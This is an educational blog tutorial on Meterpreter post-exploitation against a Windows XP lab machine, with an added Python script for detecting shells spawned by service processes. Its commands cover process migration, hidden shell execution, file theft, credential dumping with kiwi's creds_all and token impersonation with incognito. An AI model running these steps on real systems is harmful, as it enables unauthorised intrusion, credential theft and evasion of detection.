Meterpreter - Metasploit Part 3

Meterpreter

So we already got a reverse shell back in the previous blog, so what are we here for?!

But do you think a reverse shell is all we want from the target machine? Think how dope it would be if we had features to download a file from the target machine, dump hashes and passwords, take screenshots and much more.

We humans always want something better, and then something even better.

No matter what we breed we are still made of greed 

So I guess we could say that in a way Meterpreter is here to fuel our thirst



What the heck is Meterpreter?

Meterpreter is nothing but a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code. So it's an advanced shell where we get access to tons of different modules instead of just cmd input and output.

Exploitation

Command : 

set payload windows/meterpreter/reverse_tcp

Fig : 1.0


In Fig : 1.0 we have set the Meterpreter payload; as for the other settings, you know, I know :)

Command : 

exploit -j

Fig : 1.1


We can see the Meterpreter reverse shell session opened from the target machine in Fig : 1.1

Command : 

sessions -i 1

Fig : 1.2


In Fig : 1.2 we got into the Meterpreter session!

Now we are not kiddos who feel happy just because we have exploited the machine and got a session back😤, we have to focus more on the post-exploitation phase, because that's what real hackers do!

So don't be a kiddo who dances for nothing

Someone in Metasploit Part-2 blog : 



Well people change you know 🙄

So first, let's list the processes on the remote machine.

Command : 

ps

Fig : 1.3



In Fig : 1.3 we have listed the processes on the target machine, which is the same as the tasklist command on Windows.

And I want you to notice that there isn't any Meterpreter process running on the system! Well then, what are we running on?! What process are we in on the remote machine? Am I just capping about everything?

Hell nooooo

What actually happens in the background is that our Meterpreter payload gets injected into a process called svchost.exe, which has SYSTEM level access.

Meterpreter is deployed using in-memory DLL injection, which means that our payload is injected into an already existing process on the target machine instead of creating a new process. Some other payloads do create a new process, which in turn may raise alarms on the target's network, so we could say that Meterpreter helps us overcome this drawback.

Let's see the process ID of the process we are running in.

Command : 

getpid

Fig : 1.4



In Fig : 1.4 we can see that our PID matches the PID of svchost.exe, which confirms that our payload is injected into the svchost.exe process.

And as the svchost.exe with PID 1020 has SYSTEM level authority (which we can see in the User column), so do we :). If the process only had user level access, then we, the attackers, would also only have user level access on the target machine.

Things Noticed : 

The thing I have observed is that svchost.exe runs on the machine automatically as the Windows XP machine gets booted, but if we end the process manually and then try to exploit the machine, we are not able to exploit it, which means that svchost.exe must be running on the target machine in order for us to exploit it!

If you know how to overcome this, feel free to comment below and share it with the community.

Migration

Now let's say that we are a team performing red team operations and I have got access to a Windows XP machine, but for some reason you want to access the same Windows machine as well, like my brother who just wants what I have 🙃. So will you be able to exploit the machine I have already exploited? Well, it depends: you might successfully exploit the machine and inject your payload into the same svchost.exe, but as every coin has two sides, the process might crash as well, which results in losing my session too! To prevent that from happening I will simply migrate to another process on the machine, which basically means we inject ourselves into another process and get out of the process we were in, and so I can welcome you :)

To migrate to another process

Command : 

migrate PID

Fig : 1.5


In Fig : 1.5 I have migrated to a specific process called spoolsv.exe using its PID, keeping in mind that this process also runs automatically when the system boots and, more importantly, also has SYSTEM level authority.

Downloading Files : 

Now let's just say that we want to download a file from the target machine.

Command : 

download 1 2

1 : Path of the file on the remote machine
2 : Path where the file is to be stored on the local machine

In my case I have downloaded a file named credentials.txt from the desktop of the user SaiNikhil and stored the file in the current directory (denoted by .)

Fig : 1.6


In Fig : 1.6 you can see the file being downloaded from the target machine.

And we can cross-check the contents of the file as well.

Fig : 1.7



Now it's time to check the file we have downloaded locally.

Command : 

lcat FileName

where the l prefix denotes that we are specifying a local file

Fig : 1.8


In case you don't know the path that pinpoints your current location on the remote machine

Command : 

pwd

Fig : 1.9


If you don't know the location you are at on your local machine

Command : 

lpwd

Fig : 2.0


Editing files

Let's say you don't want to download the file but edit it on the target machine.

Command : 

edit PathOfTheFile

Fig : 2.1


Fig : 2.2


In Fig : 2.2 we can see the file loaded into the buffer; the edit command uses vim.

So for those who don't know how to use vim:

press i : you go from command mode into insert mode and can edit the file as you want

press esc : you get back to command mode; now press : (colon), type wq and hit enter, and your changes will be saved!

Fig : 2.3


In Fig : 2.3 we can see the changes I am going to make

Fig : 2.4


And there you go, you can see the changes reflected in Fig : 2.4

Uploading files

Now let's say you want to upload files from the local machine.

Command : 

upload 1 2

1 : Path of the file on the local machine you want to upload
2 : Path on the remote machine where you want the file to be uploaded

In my case I am uploading the file malware.txt from my current directory to the desktop directory of the user SaiNikhil

Fig : 2.5



Killing Processes

To kill processes on the target machine by name

pkill cmd.exe

To kill a process on the target machine by PID

kill pid

Fig : 2.6


In Fig : 2.6 we have killed the cmd.exe process

Ways to get into cmd

Command :

shell

Fig : 2.7




In Fig : 2.7, using the shell command gave us the standard shell of the target machine, which is nothing but the command prompt, and you can use the exit command to come out of cmd.

But you should also observe that we are creating a new process on the target machine, which means the user on the machine can find us if he/she views the list of running processes.

Fig : 2.8

In Fig : 2.8 we can see that a cmd.exe process is listed, but there is no actual cmd window open on the machine. Isn't that fishy 🧐

Command :

execute -f cmd.exe -i -H

-f : the executable command to run
-i : interact with the process after it gets created
-H : create the process hidden from view

Fig : 2.9


We've got the shell in Fig : 2.9
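The two observations above, that the payload lives inside svchost.exe (or spoolsv.exe after migrating) and that `shell` or `execute -f cmd.exe` then spawns cmd.exe as a child of that service process, give a defender a concrete hunting rule: a shell whose parent is a service host. The script below is an added detection-side illustration, not code from this blog; the process listing is constructed, and every PID except the 1020 quoted above is made up.

```python
"""Flag command shells spawned by Windows service-host processes.

Added illustration (not from the blog): when a Meterpreter session injected
into svchost.exe or spoolsv.exe runs `shell` or `execute -f cmd.exe -H`, the
resulting cmd.exe has that service process as its parent. Normal service
hosts do not launch interactive shells, so that parent/child pair is a
useful hunting signal. Input is a constructed tasklist-like listing with
the columns: pid, ppid, image name, user.
"""
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid name user")

# Service hosts named in the post that have no business launching a shell.
SERVICE_HOSTS = {"svchost.exe", "spoolsv.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def parse_listing(text):
    """Parse 'pid ppid name user' rows into {pid: Proc}; skips the header row."""
    procs = {}
    for line in text.strip().splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].isdigit():
            continue  # header row or malformed line
        p = Proc(int(fields[0]), int(fields[1]), fields[2].lower(), fields[3])
        procs[p.pid] = p
    return procs


def find_shells_from_service_hosts(procs):
    """Return (child, parent) pairs where a shell's parent is a service host."""
    hits = []
    for p in procs.values():
        parent = procs.get(p.ppid)  # None if the parent already exited
        if p.name in SHELLS and parent and parent.name in SERVICE_HOSTS:
            hits.append((p, parent))
    return hits


# Constructed sample listing (hypothetical values, not taken from the figures).
SAMPLE = """\
PID   PPID  Name          User
4     0     System        SYSTEM
560   4     smss.exe      SYSTEM
652   560   services.exe  SYSTEM
1020  652   svchost.exe   SYSTEM
1540  652   spoolsv.exe   SYSTEM
1876  1900  explorer.exe  SaiNikhil
2044  1876  cmd.exe       SaiNikhil
2200  1020  cmd.exe       SYSTEM
"""

if __name__ == "__main__":
    for child, parent in find_shells_from_service_hosts(parse_listing(SAMPLE)):
        print(f"suspicious: {child.name} (pid {child.pid}, {child.user}) "
              f"spawned by {parent.name} (pid {parent.pid})")
```

The cmd.exe launched by the logged-on user from explorer.exe is left alone; only the SYSTEM cmd.exe parented by svchost.exe is reported.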

Screenshot Capture 

To capture screenshots on the target machine

Command :

screenshot

Fig : 3.0


In Fig : 3.0 you can see that the screenshot of the target machine is stored at the given path, so let's see it.

Fig : 3.1




In Fig : 3.1 we can see the snapshot that has been captured !

Meterpreter Modules :

Modules are just pieces of software that allow us to perform a specific task.

To see the different types of modules we can load into Meterpreter

Command :

load [tab]*2

just type load and press tab twice

Fig : 3.2


In Fig : 3.2 we can see the different types of available modules.


Kiwi :

Now let's load one of the most popular modules, kiwi

Fig : 3.3


If you know nothing about the kiwi module, it is a very useful module, especially when you want anything related to credentials, such as stealing the passwords stored in memory, dumping the hashes and much more.

After loading the kiwi module, just type

Command :

? or help [module_name]

Fig : 3.4


In Fig : 3.4 we can see that a new section with commands related to the module has been added.

To view all the creds loaded in memory

Command : 

creds_all

Fig : 3.5







In Fig : 3.5 you can see the hashes and even the passwords in plain text!! I don't know what to say. Is it for real?



At this rate, does it even matter how strong our passwords are?! However, a user must have logged in for the password to be present in memory :)

Now we know how to load and use a Meterpreter module, but let's try another module which isn't as cheesy as it sounds; yes, I am talking about the incognito module :)

Incognito :

The incognito module is used to steal tokens, which allow us to impersonate other users on the system. If you want an in-depth explanation of what tokens are and why Windows uses them, I wrote a blog on that as well; to view it click here. I would highly recommend learning how they work behind the scenes, as I believe these are the things that separate us from script kiddies.

So load the incognito module as we did with kiwi

Now to list the tokens by user

Command :

list_tokens -u

Note :
You must have SYSTEM level access to view and impersonate tokens

Fig : 3.6



In Fig : 3.6 we can see all the different tokens we can steal from process memory.

To steal the token of a particular user

Command :

impersonate_token [The_Name_Of_The_User]

Fig : 3.7


In Fig : 3.7 we can see that we have successfully impersonated the user Naruto.

Now let's list the tokens again

Fig : 3.8


And there you go: as we discussed earlier, we are not able to list the tokens even though the user Naruto has administrative privileges, so only SYSTEM level privileges come to the rescue here.

So, as Meterpreter suggests, we can run the rev2self command to get back to our initial privileges, which are SYSTEM privileges in our case.

Command : 

rev2self

Fig : 3.9


In Fig : 3.9 we can see that we have got back to our initial privileges, which are none other than SYSTEM :)

Now there might be a doubt in your mind: why do we even need to impersonate other users when we already have the highest privileges? That's a really fair question. It helps us in many ways; one of the many reasons is when you need to access a local file share that can only be accessed by a particular set of users.

And let's call it a day, shall we!

We have explored Meterpreter pretty well, and I also expect you to try out the other modules as well, because they are pretty interesting.



---------------------------------------------------NOT THE END BUT A BREAK--------------------------------------------------------------
